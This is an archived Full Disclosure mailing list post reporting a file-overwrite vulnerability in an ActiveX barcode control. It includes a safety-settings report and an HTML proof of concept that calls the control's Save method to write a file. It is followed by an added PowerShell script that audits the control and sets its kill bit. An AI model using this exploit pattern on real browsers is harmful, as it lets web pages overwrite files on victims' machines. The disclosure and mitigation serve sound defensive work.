
Full Disclosure mailing list archives

Morovia Barcode ActiveX Professional 3 File Overwrite Exploit
From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Tue, 24 Jul 2012 16:34:42 -0700

Exploit Title: Morovia Barcode ActiveX Professional 3 File Overwrite Exploit
Date: July 24, 2012
Author: coolkaveh
coolkaveh () rocketmail com
https://twitter.com/coolkaveh
Vendor Homepage: http://www.morovia.com/component/barcode-activex/
Version: 3.8.0
Tested on: Windows 7

awesome coolkaveh

==========================================================================
Class MrvBarcode
GUID: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
Number of Interfaces: 1
Default Interface: IBarcode
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
Members : 127
        BackColor
        BorderColor
        BorderStyle
        BorderWidth
        ForeColor
        Comment
        CommentMarginLeft
        CommentMarginRight
        CommentMarginTop
        CommentMarginBottom
        BarHeight
        BarWidthReduction
        message
        NarrowBarWidth
        NarrowToWideRatio
        SymbolMarginTop
        SymbolMarginBottom
        SymbolMarginLeft
        SymbolMarginRight
        LabelHeight
        LabelWidth
        ZoomRatio
        RasterImageResolution
        FeatureKey
        DataMatrixModuleSize
        Save
        Load
        ExportImage
        PDFAspectRatio
        PDFMaxCols
        PDFMaxRows
        PDFModuleHeight
        PDFModuleWidth
        PDFPctOverhead
        PDFSecurityLevel
        MaxicodeClass
        MaxicodeMode
        MaxicodeCountryCode
        MaxicodeZipCode
============================================================================
<title>Morovia Barcode ActiveX </title>
<BODY>
 <object id=coolkaveh
classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object>

<SCRIPT>

function go()
 {
     File = "coolkaveh.txt"
     coolkaveh.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=go() type=button value="Click here
To Test"><br>
</body>
</HTML>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
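
The report in the post lists the control as safe for scripting and initialization with no kill bit set. As an added example (not part of the original post), the PowerShell script below checks those same registry facts for the CLSID and can set the kill bit so Internet Explorer refuses to load the control. Only the CLSID comes from the post; the parameter names are my own, and the flag value and category IDs are the standard Windows ones.

```powershell
# Added example, not from the original post: audit (and optionally kill-bit)
# the ActiveX control named in the report. -SetKillBit needs an elevated prompt.
param(
    [string]$Clsid = '{18B409DA-241A-4BD8-AC69-B5D547D5B141}',  # CLSID from the post
    [switch]$SetKillBit                                         # hypothetical switch name
)

$KillBit       = 0x400                                     # COMPAT_EVIL_DONT_LOAD
$CatSafeScript = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForScripting
$CatSafeInit   = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForInitializing
$FlagName      = 'Compatibility Flags'

# A 32-bit control on 64-bit Windows registers under WOW6432Node, so check both views.
$views = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node' | Where-Object { Test-Path $_ }

foreach ($root in $views) {
    $classKey  = "$root\Classes\CLSID\$Clsid"
    $compatKey = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    if ($SetKillBit) {
        if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }
        $old = (Get-ItemProperty -Path $compatKey -Name $FlagName -ErrorAction SilentlyContinue).$FlagName
        # OR the bit in so any other compatibility flags already present are kept.
        Set-ItemProperty -Path $compatKey -Name $FlagName -Type DWord -Value ([int]$old -bor $KillBit)
    }

    # Re-read the flags so the output reflects the state after any change.
    $flags = 0
    if (Test-Path $compatKey) {
        $flags = [int](Get-ItemProperty -Path $compatKey -Name $FlagName -ErrorAction SilentlyContinue).$FlagName
    }

    [pscustomobject]@{
        View          = $root
        Registered    = Test-Path $classKey
        SafeForScript = Test-Path "$classKey\Implemented Categories\$CatSafeScript"
        SafeForInit   = Test-Path "$classKey\Implemented Categories\$CatSafeInit"
        KillBitSet    = ($flags -band $KillBit) -ne 0
    }
}
```

Because the report also shows `Implements IObjectSafety: True`, deleting the two category keys alone would not stop the control from declaring itself safe; the kill bit is the setting that blocks instantiation in Internet Explorer. Per-user registrations under `HKCU:\Software\Classes` are not covered by this check.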

